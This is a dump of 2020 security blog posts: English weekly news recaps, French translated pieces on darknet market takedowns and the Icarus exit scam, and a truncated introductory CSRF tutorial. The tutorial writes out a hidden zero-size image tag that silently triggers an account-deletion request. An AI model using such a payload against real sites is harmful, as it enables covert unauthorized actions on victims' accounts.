numbers, addresses and (undisclosed) financial information.\nPrivacy # Federal Judge Temporarily Blocks Trump\u0026rsquo;s TikTok Ban\nA judge in the District of Columbia granted TikTok\u0026rsquo;s request for a temporary injunction preventing the Trump administration\u0026rsquo;s order aimed at banning the application from Google\u0026rsquo;s and Apple\u0026rsquo;s app stores. TikTok\u0026rsquo;s lawyer claimed that ByteDance, the parent company was denied due process and that a ban would violate the First Amendment rights to free speech.\nPastebin adds \u0026lsquo;Burn After Read\u0026rsquo; and \u0026lsquo;Password Protected Pastes\u0026rsquo; to the dismay of the infosec community\nPastebin, the most popular text snippet sharing website added features to enhance users privacy. The service is notably used by malicious actors for things such as sharing hacked data, or by malware operators to send malicious commands to infected hosts. Pastebin is scrapped by various security companies and researchers to identify malicious ad sensitive content. They will now be prevented to do that to a certain extent. Some expect malware operators to take advantage of these new features widely.\nFree, Privacy-First Analytics for a Better Web\nCloudflare announced a new analytics tool. The company says that it is \u0026ldquo;privacy-first\u0026rdquo; as it does not use any client-side information (such as cookies), and doesn\u0026rsquo;t fingerprint visitors using their IP address, or user agent string. Paying customers can already see this feature in their dashboards, but Cloudflare is planning on releasing a free JavaScript-based version of the tool for people not using their DNS servers.\n","date":"2020-10-02","externalUrl":null,"permalink":"/blog/weekly-news-recap-3/","section":"News","summary":"Missed the news this week? Then get up to speed with our news recap. Among other things, ESET discovers an APT allegedly active for at least eleven years; a bitcoin exchange owner was convicted for racketeering and laundering, KuCoin lost USD 150 million in a hack. Also, some new arrests related to the darknet, the man that hacked LinkedIn and Dropbox in 2012 was sentenced, ransomware again, and Cloudflare releases a “privacy-first” analytics tool.\n","title":"Weekly News Recap 3","type":"news"},{"content":"Had a busy week and no time to follow the latest news this week? We got you covered with our weekly news recap.\nThis week, we learned some information related to Iranian APT, and North Korea money laundering schemes. Law enforcement conducted an international operation against darknet market vendors, and a programmer involved with Silk Road pleaded guilty of lying to federal agents. One member of the dark overlord hacking group was sentenced to prison, and Windows XP\u0026rsquo;s source code leaked online. Finally, researchers discovered a dangerous flaw in the Instagram app, and Shopify and Strava had data privacy issues.\nAPT # Rampant Kitten - An Iranian Espionage Campaign\nA new report by CheckPoint unravelled an ongoing surveillance operation by Iranian entities. This operation was aimed at Iranian expats and dissidents and has allegedly been going on for years. Multiple attack vectors such as Windows info stealers (targetting Telegram desktop, Windows files, and Keepass), as well as an Android backdoor, and Telegram phishing pages were found.\nSecret documents show how North Korea launders money through U.S. banks\nJournalists were able to consult a bunch of leaked FinCEN documents detailing how North Korea was able to carry out an elaborate money-laundering scheme for years, using shell and Chinese companies, as well as New York banks. The documents mainly cover the period between 2008 and 2017, where more than USD 174.8 million as allegedly laundered. Banks such as JP Morgan and the Bank of New-York Mellon were involved.\nDarknet # 179 Darknet Market Vendors Arrested Across the Globe in a Large Police Operation: DisrupTor\nDisrupTor, a nine months operation coordinated by Europol and involving various police forces in Europe and the US, led to the arrest of 179 darknet market vendors across the globe. Police also seized USD 6.5 million in cash and cryptocurrencies, as well as 500 kilograms of drugs, and 64 firearms. Law enforcement agencies used the data issued from the Wall Street Market take-down earlier last year to get the necessary intelligence.\nComputer Programmer Pleads Guilty In Manhattan Federal Court To Making False Statements About His Involvement In The “Silk Road” Website\nMichael R. Weigand, aka Shabang, pleaded guilty to making false statements to the IRS and FBI saying he was not involved with Silk Road market. Weigland provided technical support to the Silk Road administrator and identified several vulnerabilities within the website. He was also involved in travelling to London remove evidence from Tomas Clark\u0026rsquo;s (aka Variety Jones / The Plural of Mangoose) residence. Weigand is scheduled to be sentenced on December 18 and risks up to five years in prison.\nGeneral Security # Member of \u0026lsquo;The Dark Overlord\u0026rsquo; hacking group sentenced to five years in prison\nNathan Francis Wyatt, a British national, was sentenced to five years in prison and to pay USD 1,467,048. The hacker was involved with The Dark Overlord group since 2016 and was involved with the hacking of companies, stealing their sensitive data and asking them for ransoms not to make them public. He was arrested in the UK in 2017, and extradited in US in the end of 2019.\nWindows XP source code leaks online\nAccording to The Verge, torrent files with Windows XP\u0026rsquo;s source code are currently being shared by various sharing sites. While the code has reportedly been shared for a couple of years already, this is the first time that it is made public. The torrent files are also including references to conspiracy theories involving Bill Gates.\nPrivacy # #InstaHack: how researchers were able to take over the Instagram App using a malicious image\nResearchers found a critical vulnerability in the Instagram for iOS and Android. The flaw could have allowed attackers to perform remote code execution and to get full control of the application (for example viewing private messages, but also accessing the camera). The flaw could have been exploited by sending a malicious image using any messaging service. When opening Instagram, the picture would have been parsed by Mozjpeg, an open-source JPEG images decoder, and lead to a heap buffer overflow.\nShopify Reveals That Employees Stole Customer Data from Merchants\nShopify, one of the leading eCommerce platform, reported this week that two rogue employees belonging to their support team stole data belonging to 200 merchands. Shopify immediately terminated these employees and reported the incident to the FBI, which is still investigated. So far, there is no evidence of the data being used.\nStrava app shows your info to nearby users unless this setting is disabled\nStrava, a run tracking app reportedly allowed to show run itinerary of other people, if privacy settings were not explicitly changed. Users reported that only crossing into another user would add them as running together in the application, making the other party\u0026rsquo;s map itinerary available.Windows XP source code leaks online\n","date":"2020-09-25","externalUrl":null,"permalink":"/blog/weekly-news-recap-2/","section":"News","summary":"Had a busy week and no time to follow the latest news this week? We got you covered with our weekly news recap.\nThis week, we learned some information related to Iranian APT, and North Korea money laundering schemes. Law enforcement conducted an international operation against darknet market vendors, and a programmer involved with Silk Road pleaded guilty of lying to federal agents. One member of the dark overlord hacking group was sentenced to prison, and Windows XP’s source code leaked online. Finally, researchers discovered a dangerous flaw in the Instagram app, and Shopify and Strava had data privacy issues.\n","title":"Weekly News Recap 2","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nAujourd\u0026rsquo;hui à 15h00 CET, Europol et le Département de la Justice des États-Unis ont publié des communiqués de presse concernant ce que le DoJ a présenté comme « la plus grande opération internationale des forces de l\u0026rsquo;ordre ciblant les trafiquants d\u0026rsquo;opioïdes sur le Darknet ».\nDisrupTor n\u0026rsquo;était pas à proprement parler une action unique, mais une série d\u0026rsquo;opérations conjointes coordonnées par Europol, avec le soutien de multiples agences de forces de l\u0026rsquo;ordre en Autriche, à Chypre, en Allemagne, aux Pays-Bas, en Suède, au Canada, au Royaume-Uni et aux États-Unis. Cette opération a duré neuf mois au total et a pu être menée grâce à l\u0026rsquo;exploitation d\u0026rsquo;informations obtenues lors de la fermeture de Wall Street Market en mai 2019.\nDisrupTor a conduit à l\u0026rsquo;arrestation de 179 vendeurs : 121 aux États-Unis, 42 en Allemagne, 8 aux Pays-Bas, 4 au Royaume-Uni, 3 en Autriche et 1 en Suède. En plus de ces arrestations, l\u0026rsquo;équivalent de 6,5 millions de dollars (en espèces et en cryptomonnaies), 500 kilogrammes de drogues diverses et 64 armes à feu ont été saisis.\nAccompagnant les communiqués de presse, le discours habituel :\nL\u0026rsquo;âge d\u0026rsquo;or des places de marché du dark web est révolu. Des opérations comme celles-ci mettent en évidence la capacité des forces de l\u0026rsquo;ordre à contrer le chiffrement et l\u0026rsquo;anonymat des places de marché du dark web. La police ne se contente plus de fermer ces places de marché illégales - elle traque également les criminels qui achètent et vendent des biens illégaux via ces sites.\nWall Street Market a été fermé début mai 2019 par la police allemande en collaboration avec Europol et diverses agences de forces de l\u0026rsquo;ordre en Europe et aux États-Unis. Au même moment, le marché Valhalla a été fermé par les douanes finlandaises. À ce stade, WSM comptait plus de 1 150 000 utilisateurs et 5 400 vendeurs, et les forces de l\u0026rsquo;ordre ont saisi un demi-million d\u0026rsquo;euros en espèces, ainsi que « du Bitcoin et du Monero pour des montants à six chiffres ».\nLe nombre d\u0026rsquo;arrestations est en effet assez impressionnant. Cependant, comparé au nombre de vendeurs enregistrés sur la plateforme, on ne peut qu\u0026rsquo;en déduire que les affaires continueront comme d\u0026rsquo;habitude pour les marchés du darknet. Si l\u0026rsquo;on regarde la proportion d\u0026rsquo;arrestations, cela représente jusqu\u0026rsquo;à 3,31 % des vendeurs de WSM (en réalité moins, car certains comptes étaient gérés par plusieurs personnes).\nPour référence, DarkMarket, l\u0026rsquo;un des plus grands marchés actifs aujourd\u0026rsquo;hui, compte 1 819 vendeurs. Considérant que les arrestations ont été effectuées sur neuf mois, et qu\u0026rsquo;Empire Market (qui était plusieurs fois plus grand que DarkMarket) a réalisé un exit scam quelques semaines auparavant, il est raisonnable de penser (pure spéculation) qu\u0026rsquo;un bon nombre de vendeurs arrêtés n\u0026rsquo;étaient pas actifs sur DarkMarket.\nLes détails sur la façon dont les forces de l\u0026rsquo;ordre ont retrouvé les vendeurs ne sont pas partagés. On peut en déduire que les forces de l\u0026rsquo;ordre ont utilisé des méthodes telles que le traçage des paiements Bitcoin, l\u0026rsquo;obtention d\u0026rsquo;informations à partir des messages entre vendeurs, clients et modérateurs lorsque PGP n\u0026rsquo;était pas utilisé, des opérations d\u0026rsquo;infiltration, etc.\nTous les noms et pseudonymes des vendeurs n\u0026rsquo;ont pas été divulgués (peut-être parce que les forces de l\u0026rsquo;ordre utilisent actuellement leurs comptes pour attraper d\u0026rsquo;autres utilisateurs ?), mais nous avons des informations sur quelques-uns d\u0026rsquo;entre eux :\n« Stealthgod » était un groupe de cinq accusés du sud de la Californie qui auraient été impliqués dans environ 18 000 transactions et étaient actifs sur plusieurs marchés. Arden McCann, opérant sous les noms de « XanaxLabs », « Pasitheas », « DRXanax », « TheMailMan », « WhiteYellowGreen », « XanaxBloters », a été arrêté au Canada en février de cette année et aurait distribué pour 13 millions de dollars de Xanax. Khlari Sirotkin, Kelly Stephens, Sean Deaver, Abby Jones et Sasha Sirotkin auraient distribué plus d\u0026rsquo;un million de pilules contrefaites contenant du fentanyl et blanchi environ 2,8 millions de dollars, et ont été arrêtés en janvier de cette année (DoJ). Le groupe s\u0026rsquo;est formé en 2013 et était actif sur Silk Road, Empire, Dream, Sleep et Nightmare Markets. Ils utilisaient des pseudonymes tels que « Killa Kells », « oxxxymoron », « Interstatefatz », « Fatz », « Abby Fatz ». (source Cincinnati) William Anderson Burgamy et Hyrum T. Wilson étaient impliqués dans l\u0026rsquo;envoi par courrier d\u0026rsquo;au moins 19 000 unités de médicaments sur ordonnance. Burgamy opérait sous le nom de « NeverPressedRX (NPRX) » sur le darknet, et Wilson (qui était pharmacien) lui envoyait des médicaments par courrier. Les arrestations ont eu lieu en avril de cette année (plus de détails ici et ici) Aaron Brewer était impliqué dans au moins 757 envois de drogue vers 609 adresses uniques entre décembre 2019 et mars 2020. Bien que l\u0026rsquo;opération soit présentée comme la plus grande opération sur les marchés du darknet pour les opioïdes, les saisies d\u0026rsquo;espèces (et de cryptomonnaies) ne sont pas si significatives. En calculant une moyenne par vendeur arrêté, cela ferait 36 312 euros. Pour référence, lors de la fermeture d\u0026rsquo;Alphabay, les forces de l\u0026rsquo;ordre ont saisi l\u0026rsquo;équivalent de 8,8 millions de dollars en Bitcoin, Ethereum, Monero et ZCash.\nLes drogues (500 kilogrammes au total, 2,8 kilogrammes par vendeur en moyenne) pourraient cependant avoir une valeur relativement importante sur le marché, car les saisies comprenaient du fentanyl, de l\u0026rsquo;oxycodone, de l\u0026rsquo;hydrocodone, de la méthamphétamine, de l\u0026rsquo;héroïne, de la cocaïne, de l\u0026rsquo;ecstasy et du MDMA. Cet article liste les prix médians (obtenus par Grams, donc datant de quelques années) pour la cocaïne à 97,39 dollars et 37,07 dollars pour le MDMA.\nPour mettre les 500 kilogrammes en perspective, voici quelques chiffres fournis par l\u0026rsquo;Observatoire européen des drogues et des toxicomanies concernant les saisies en Europe, en Turquie et en Norvège en 2019 :\n22,9 tonnes d\u0026rsquo;héroïne en 50 000 saisies 1,7 tonne de MDMA en 31 000 saisies 13,4 tonnes d\u0026rsquo;amphétamines en 40 000 saisies 1,4 tonne de méthamphétamine en 19 000 saisies Sur un autre sujet, l\u0026rsquo;un des ex-modérateurs du marché Icarus a déclaré que le FBI était probablement impliqué dans l\u0026rsquo;exit scam soudain (voir l\u0026rsquo;article ici). Comme aucune annonce n\u0026rsquo;a été faite à ce sujet, cela semble encore plus improbable qu\u0026rsquo;avant.\nSources :\nAnnonce d\u0026rsquo;Interpol Annonce d\u0026rsquo;Interpol sur la saisie de Wall Street Market Conférence de presse du DoJ Plainte pénale de Wall Street Market Communiqué de presse du DoJ Opération Disarray Opération SaboTor ","date":"2020-09-22","externalUrl":null,"permalink":"/fr/posts/2020/179-darknet-market-vendors-arrested-across-the-globe-in-a-large-police-operation-disruptor/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nAujourd’hui à 15h00 CET, Europol et le Département de la Justice des États-Unis ont publié des communiqués de presse concernant ce que le DoJ a présenté comme « la plus grande opération internationale des forces de l’ordre ciblant les trafiquants d’opioïdes sur le Darknet ».\n","title":"179 vendeurs du darknet arrêtés à travers le monde dans une vaste opération policière : DisrupTor","type":"posts"},{"content":"Too busy during the week? You don\u0026rsquo;t have time to follow the latest news? Don\u0026rsquo;t worry; I have you covered. Starting this week, I will try to publish every week a recap of newsworthy items with links to relevant articles from more details.\nThis weekly recap will be separated in a couple of sections: Darknet, Cryptocurrencies, APT, General Security. This may change across time, but these are more or less the subjects that will be covered.\nAPT # Back Despite Disruption: RedDelta Resumes Operations (Recorded Future)\nTwo months after extensive public reporting on its targeting of the Vatican and other Catholic organisations, RedDelta (affiliated to China) is back. They did change control domains and took other basic operational security measures, but their techniques and procedures remain consistent. Insik attributed new activities to the group such as PlugX samples featuring decoy documents themed around Catholicism, and additional network intrusion activity targeting Myanmar government systems and two Hong Kong universities.\nSeven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns (DoJ)\nThe American authorities charged 2 Malaysian and 5 Chinese people linked to the Apt41, aka Barium, Winnti, Wicked Panda, and Wicked Spider. One of the defendants has alleged connections with the Chinese Ministry of State Security. This APT made more than 100 victims globally and is involved in the theft of source code, software code signing certificates, customer account data, and valuable business information. They also ran ransomware and crypto-jacking. In addition to arrest warrants, the gov seized hundreds of accounts, servers, and domain names. No numbers are shared, but a lot of money is probably involved.\nCryptocurrencies # Binance is sued by Japanese crypto exchange Fisco for allegedly facilitating the laundering of $9 million (The Block)\nOn Monday, Fisco, a Japanese crypto currencies exchange sued Binance in a US court following Zaif (exchange belonging to Fisco) hack in 2018. During this hack, they lost about USD 63 million in various cryptocurrencies. The thieves laundered 1,451.7 BTC through Binance, which Fisco is accusing of having unbelievably lax KYC (Know Your Customers) policies that allowed the laundering to happen. Fisco is seeking USD 9 million in compensation.\nCrypto Investors Have Ignored Three Straight 51% Attacks on ETC (Coin Desk)\nETC has been experiencing three 51% attacks (allowing attackers to double-spend coins if they have more than half of the hashing power within the network) within one month, but the price stays relatively stable.\nKraken Wins Bank Charter Approval (Kraken Blog)\nThe State of Wyoming has approved Kraken\u0026rsquo;s application to form the world\u0026rsquo;s first Special Purpose Depository Institution (SPDI), tentatively called Kraken Financial. Kraken aims to create a bridge between the crypto economy and the existing financial system, which can be achieved thanks to the bank charter permit, that allows Kraken to operate a fully independent bank. Kraken Financial will only be available to US residents at first but hope to expand soon.\nPolice summon Bithumb chairman for questioning over alleged fraud (Coin Telegraph)\nThe Seoul Metropolitan Police Agency is seeking to question Lee Jung-hoon, chairman of Bithumb. He is allegedly (among other things) accused of fraud regarding the BXA token\u0026rsquo;s listing. The purported fraud caused up to USD 25 million.\nDarknet # Icarus Market Exit Scam - A Chronology of Events\nOn September 9th, Shortly after Empire Market exit scammed, Icarus market did the same in a surprisingly similar manner. One of the previous moderators declared war on the administrators, and the FBI might have located the servers before the shutdown.\nGeneral Security # Cloudflare and the Wayback Machine, joining forces for a more reliable Web (Archive.org blog)\nCloudflare and Wayback Machine established a new partnership. The websites behind Cloudflare servers, and using the \u0026ldquo;Always Online\u0026rdquo; service will now have their content automatically archived on the Wayback machines, and served from there if the website\u0026rsquo;s host becomes unavailable.\nHospital patient dies following botched ransomware attack (Graham Cluley)\nA patient died in Germany because of a ransomware attack hit the Düsseldorf University Clinic where the patient was supposed to be sent. Instead, he was redirected to another hospital, 32 km away, and couldn\u0026rsquo;t be treated on time. The ransom was addressed to the university the hospital was belonging to, and not to the hospital itself.\nMozilla to shutdown Firefox Send and Firefox Notes (Mozilla Blog)\nMozilla redefined its product focus and will decommission Firefox Send and Notes. Firefox Send was already temporarily made unavailable starting July 2020, after it was discovered that malware operators were abusing it.\nCerberus banking Trojan source code released for free to cyberattackers (ZDNet)\nIt was recently discovered that Cerberus (an android banking trojan active since July 2019) was being auctioned in a bid by one of its developers. The starting price was USD 50,000, and the package was including all the source code (.apk malware and control panel) as well as the customers list, and their contact information. It was reported that as no one looked interested in paying this much, and, as the auction failed the developer released the code source for free on a Russian forum\nThunderbird implements PGP crypto feature requested 21 years ago (Thunderbird blog)\nTwenty-one years after the ticket asking for PGP to be integrated with Thunderbird was created, the integration has finally been completed. It was possible to use PGP within the mail client before, but it required a third-party plug-in.\n","date":"2020-09-19","externalUrl":null,"permalink":"/blog/weekly-news-recap-1/","section":"News","summary":"Too busy during the week? You don’t have time to follow the latest news? Don’t worry; I have you covered. Starting this week, I will try to publish every week a recap of newsworthy items with links to relevant articles from more details.\n","title":"Weekly News Recap 1","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSeulement quelques semaines après que Empire Market ait réalisé un exit scam, Icarus suit ses traces de manière quelque peu similaire, et nous pouvons entendre des affirmations d\u0026rsquo;implication du FBI. Examinons la chronologie des événements.\nLe 9 septembre, le marché est devenu inaccessible. Peu après, LaRouge, le modérateur principal, a communiqué sur Dread que le marché faisait l\u0026rsquo;objet d\u0026rsquo;une maintenance imprévue et serait de retour en ligne dans quelques heures. Quelques heures plus tard, nous avons appris que la maintenance était due à une migration de serveur. Jusque-là, rien d\u0026rsquo;impossible. On aurait pu supposer qu\u0026rsquo;ils avaient un point de défaillance unique et que ce serveur avait lâché.\nLaRouge annonce une maintenance imprévue LaRouge partage la raison de la maintenance Un peu plus tard, le 11 septembre, Mitsuki12, un modérateur, a expliqué que la migration était due à l\u0026rsquo;augmentation du trafic. Cette explication aurait eu du sens juste après l\u0026rsquo;exit scam d\u0026rsquo;Empire, mais la croissance des nouveaux utilisateurs vers les autres marchés importants était relativement stable, on peut donc supposer que si les serveurs d\u0026rsquo;Icarus étaient insuffisants pour le trafic, cela n\u0026rsquo;aurait pas été quelque chose d\u0026rsquo;inattendu à ce stade.\nMitsuki12 dit que la migration de serveur est due à l\u0026rsquo;augmentation du trafic Le 12 septembre, trois jours après la première annonce, Mitsuki12 a posté que, sans nouvelles des personnes de rang supérieur, et si les choses ne revenaient pas en ligne, il publierait ce qu\u0026rsquo;il pensait être arrivé au marché. Le message suggérait qu\u0026rsquo;il n\u0026rsquo;avait pas de nouvelles de l\u0026rsquo;administrateur depuis un long moment (« être dans le noir n\u0026rsquo;est pas mon truc »).\nMitsuki12 promet une mise à jour sur Icarus Il a promis de publier la mise à jour le lendemain à 20h CET, ce qu\u0026rsquo;il a fait. Le message (supprimé depuis) indiquait que selon lui, le marché avait disparu, et ajoutait un message au staff qui semblait un peu menaçant, même si le message n\u0026rsquo;était pas très explicite.\nEn même temps, il a changé la description du marché sur le sous-forum Dread, et remplacé l\u0026rsquo;URL par « (not anymore) ».\nUne mise à jour peu amicale sur Icarus par Mitsuki12 Plus tard, il a été retiré de la liste des modérateurs sur le fil de Dread et affirme que cela a été fait par l\u0026rsquo;autre membre du staff le 14 septembre vers 13:00. Notez qu\u0026rsquo;à ce jour, l\u0026rsquo;URL « (not anymore) » n\u0026rsquo;a pas changé. Donc si un autre membre de l\u0026rsquo;équipe l\u0026rsquo;a effectivement retiré des modérateurs, il semble être d\u0026rsquo;accord avec cette analyse.\nMitsuki12 affirme avoir été supprimé de la liste des modérateurs Depuis, il ne semble pas y avoir d\u0026rsquo;activité du staff. Le dernier message de LaRouge date du 15 septembre à 21:12, le compte administrateur IcarusMarket n\u0026rsquo;a pas de messages depuis le début des événements, et Azaeel (l\u0026rsquo;autre modérateur) non plus.\nLes autres personnes impliquées sont calmes ces jours-ci, mais ce n\u0026rsquo;est pas le cas de Mitsuki12 qui a continué à publier diverses choses sur Dread après cela. Bien que je considère que certaines choses qu\u0026rsquo;il affirme ne sont pas impossibles, une bonne partie semble être du grand n\u0026rsquo;importe quoi.\nLe 15 septembre à 11:25, il a fait un message(1) (le premier visible) sur /IcarusMarket (l\u0026rsquo;original était juste /Icarus). Maintenant, il menace les administrateurs de les poursuivre grâce à son ancienne équipe du secteur privé et leurs contacts avec les forces de l\u0026rsquo;ordre, mais il leur donne jusqu\u0026rsquo;au 22 à 20h CET « pour décider ». Ce que cela signifie n\u0026rsquo;est pas clair, et il a répondu dans le fil que ce qu\u0026rsquo;il veut est « confidentiel, du moins pour le moment ».\nMise à jour sur Icarus sur le nouveau sous-forum Fait intéressant, il ne semble pas considérer cela comme du chantage ou de l\u0026rsquo;extorsion. Je suppose que la définition des mots change beaucoup d\u0026rsquo;une personne à l\u0026rsquo;autre.\nMitsuki12 affirme que son message n\u0026rsquo;est pas du chantage Une autre information intéressante que vous aurez captée est qu\u0026rsquo;il affirme que le FBI a trouvé les serveurs, ce qui a poussé les administrateurs à fuir. Le FBI aurait pu retrouver le serveur en raison de la mauvaise sécurité opérationnelle des administrateurs (aucun détail fourni).\nApparemment, sans cela, il n\u0026rsquo;y aurait pas eu d\u0026rsquo;exit scam. Même si Mitsuki12 affirme que, étant le dernier dans la chaîne de commandement, il n\u0026rsquo;aurait pas été au courant.\nCommentaires sur le fil de mise à jour d\u0026rsquo;Icarus Market Commentaires sur le fil de mise à jour d\u0026rsquo;Icarus Market Je crois que ce que l\u0026rsquo;ex-modérateur dit doit être pris avec précaution, mais tous les éléments montrent qu\u0026rsquo;il s\u0026rsquo;agit d\u0026rsquo;un exit scam, donc il a définitivement raison sur ce point.\nQuant à l\u0026rsquo;affirmation concernant le FBI, il n\u0026rsquo;est pas impossible qu\u0026rsquo;ils aient trouvé le serveur, mais si c\u0026rsquo;est le cas, les choses ne semblent pas cohérentes (je ne suis pas expert des forces de l\u0026rsquo;ordre, donc je pourrais faire de mauvaises suppositions) :\nL\u0026rsquo;ex-modérateur dit que le FBI a trouvé les serveurs (pas saisis), et qu\u0026rsquo;en conséquence, les administrateurs ont tout fermé. Je ne parierais pas sur la probabilité que l\u0026rsquo;administrateur en était conscient sans saisie. De plus, s\u0026rsquo;ils avaient trouvé le serveur, pourquoi n\u0026rsquo;ont-ils pas essayé de le prendre en main, ou au moins de l\u0026rsquo;intercepter ? S\u0026rsquo;ils avaient saisi le serveur, il aurait dû y avoir des annonces quelque part, ou peut-être des arrestations, mais rien n\u0026rsquo;a été annoncé. Si les administrateurs avaient une sécurité opérationnelle si mauvaise, il semble difficile de croire que le FBI ne pouvait pas les retrouver une fois qu\u0026rsquo;ils avaient trouvé les serveurs. De plus, à mon avis, toute l\u0026rsquo;affirmation selon laquelle Mitsuki serait lié à des entreprises privées travaillant avec les forces de l\u0026rsquo;ordre est une pure fantaisie. Si c\u0026rsquo;était vraiment le cas, il serait totalement stupide de le dire publiquement, et je ne vois pas des personnes dans une entreprise réputée l\u0026rsquo;aider dans une vendetta personnelle (bien qu\u0026rsquo;une dénonciation anonyme soit une possibilité). De plus, il prétend être analyste, mais toute cette histoire d\u0026rsquo;entraînement d\u0026rsquo;un modèle d\u0026rsquo;IA n\u0026rsquo;a pas de sens. On n\u0026rsquo;entraîne pas une IA avec une quantité ridiculement faible de données.\nQuant à ses affirmations selon lesquelles la plupart des vendeurs d\u0026rsquo;Empire seraient allés sur Icarus sans trop réfléchir, c\u0026rsquo;est tout simplement infondé. D\u0026rsquo;après le suivi que j\u0026rsquo;ai commencé le 25 août sur DarkMarket et WhiteHouse Market, les deux ont gagné respectivement 6,07 % et 10,76 % de nouveaux vendeurs sur une période de deux semaines.\nEnfin, concernant les affirmations selon lesquelles il y avait des plans pour l\u0026rsquo;avenir du marché, je dirais que c\u0026rsquo;est crédible car, comme le montrent les captures d\u0026rsquo;écran suivantes, le staff a récemment effectué un nombre important de mises à jour. Ces mises à jour incluent la mise à niveau vers la V3 des services onion. Les services V2 pourront encore fonctionner jusqu\u0026rsquo;à la seconde moitié de l\u0026rsquo;année prochaine, il n\u0026rsquo;y aurait donc eu aucun intérêt pour eux à faire cette mise à niveau s\u0026rsquo;ils prévoyaient un exit immédiat. Certains chercheurs disent depuis un moment que ce marché allait faire un exit. Une possibilité est que c\u0026rsquo;était dans leurs plans à moyen terme, mais que l\u0026rsquo;afflux de fonds causé par les anciens clients d\u0026rsquo;Empire était assez d\u0026rsquo;argent à leur goût.\nDernière mise à jour d\u0026rsquo;Icarus quelques jours avant l\u0026rsquo;exit scam Annonce de la mise à niveau vers le service caché V3 d\u0026rsquo;Icarus Avec un peu de patience, nous saurons si l\u0026rsquo;histoire du FBI est vraie, mais à mon avis, Mitsuki12 est simplement blessé de ne pas avoir fait partie du plan (ou de ne pas avoir réalisé quel était le plan), et il aimerait sa part du gâteau ou un peu d\u0026rsquo;attention. Je ne pense pas que quoi que ce soit se passera le 22, mais attendons de voir.\nNotes :\n(1) : Une erreur était présente dans cette phrase. J\u0026rsquo;avais dit avant que le fil avait été créé par Mitsuki12, alors qu\u0026rsquo;il avait été créé par Azaeel. Le fil était apparemment utilisé en privé lorsque le marché était encore fonctionnel pour tester diverses techniques de rédaction afin d\u0026rsquo;attirer plus de vendeurs et d\u0026rsquo;acheteurs.\n","date":"2020-09-19","externalUrl":null,"permalink":"/fr/posts/2020/icarus-market-exits-scam/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nSeulement quelques semaines après que Empire Market ait réalisé un exit scam, Icarus suit ses traces de manière quelque peu similaire, et nous pouvons entendre des affirmations d’implication du FBI. Examinons la chronologie des événements.\n","title":"Exit scam d'Icarus Market - Chronologie des événements","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nLe Cross-Site Request Forgery, ou CSRF, est une attaque qui permet de cibler des applications web. Typiquement, elle consiste à faire exécuter involontairement à un utilisateur une action sur un site où il est connecté.\nDans cet article, nous allons discuter de certaines des façons dont une telle attaque peut être menée, et comment il est possible de s\u0026rsquo;en protéger. Cet article vise à fournir une introduction au sujet, donc toutes les possibilités d\u0026rsquo;exploitation et les contre-mesures ne seront pas abordées. Si vous souhaitez en savoir plus, plusieurs références à la fin de l\u0026rsquo;article traitent du sujet en profondeur.\nComment mener une attaque CSRF ? # Un exemple simple # Imaginons que Bob et Alice sont tous les deux membres d\u0026rsquo;un forum. Pour une raison quelconque, Bob n\u0026rsquo;aime pas ce qu\u0026rsquo;Alice dit et décide de lui donner une leçon en faisant supprimer son compte. La plateforme utilise un logiciel open source, et en examinant le code, Bob peut voir que lors de la suppression d\u0026rsquo;un utilisateur, la requête GET suivante est effectuée : /users/delete?userName=[userName]\u0026amp;confirm=True.\nSur cette base, Bob va envoyer un email à l\u0026rsquo;administrateur du forum, et en utilisant un prétexte, va l\u0026rsquo;amener à cliquer sur l\u0026rsquo;URL forum.tld/delete?userName=Alice\u0026amp;confirm=True. Puisque l\u0026rsquo;administrateur sera connecté au forum en cliquant sur ce lien, la fonction de suppression du compte d\u0026rsquo;Alice sera appelée, et le compte sera effectivement supprimé.\nMaintenant, le compte sera supprimé, mais l\u0026rsquo;administrateur aura un message d\u0026rsquo;erreur disant quelque chose comme « Le compte a été supprimé avec succès », ce qui n\u0026rsquo;est pas très discret. L\u0026rsquo;administrateur réalisera ce qui s\u0026rsquo;est passé et bannira Bob.\nMais y avait-il un moyen pour Bob de mener l\u0026rsquo;attaque sans être aussi facilement détecté ? Oui. Au lieu de simplement partager le lien dans son email, il aurait pu envoyer un email formaté en HTML incluant une image de 0x0 px :\n\u0026lt;img src=\u0026quot;http://forum.tld/delete?userName=Alice\u0026amp;confirm=True\u0026quot; width=\u0026quot;0\u0026quot; height=\u0026quot;0\u0026quot; border=\u0026quot;0\u0026quot;\u0026gt;\nSi l\u0026rsquo;administrateur ouvrait l\u0026rsquo;email HTML dans le même navigateur où il est connecté au forum, la requête aurait été exécutée et il n\u0026rsquo;aurait pas pu remarquer ce qui venait de se passer.\nNotez que dans cet exemple, nous mentionnons des requêtes GET, mais il est possible d\u0026rsquo;exploiter cette faille via une requête POST également. Pour ce faire, il faudrait créer une page web avec un formulaire en HTML et le faire se soumettre automatiquement lorsque la page est chargée.\nEn bref # Pour résumer, trois éléments essentiels doivent être présents pour qu\u0026rsquo;une attaque CSRF réussisse :\nLa requête HTTP doit être effectuée depuis le navigateur où la victime est authentifiée sur le site web cible L\u0026rsquo;attaquant connaît les paramètres attendus dans la requête et ce qu\u0026rsquo;ils doivent être. Tous les paramètres doivent être prévisibles L\u0026rsquo;application cible repose sur des cookies de session Comment protéger votre service contre les attaques CSRF # La façon la plus courante de traiter les attaques CSRF est d\u0026rsquo;utiliser des jetons CSRF, qui sont une chaîne de caractères imprévisible (pour un tiers) générée côté serveur pour chaque requête, et validée par le serveur pour chaque requête.\nCes jetons doivent être ajoutés à chaque requête modifiant un état du système, et ne doivent pas être passés en GET (c\u0026rsquo;est-à-dire qu\u0026rsquo;ils ne doivent pas être présents dans l\u0026rsquo;URL). La raison principale est que tout ce qui est passé en GET peut être enregistré à divers endroits et transmis avec les requêtes HTTP. Par conséquent, aucune opération modifiant 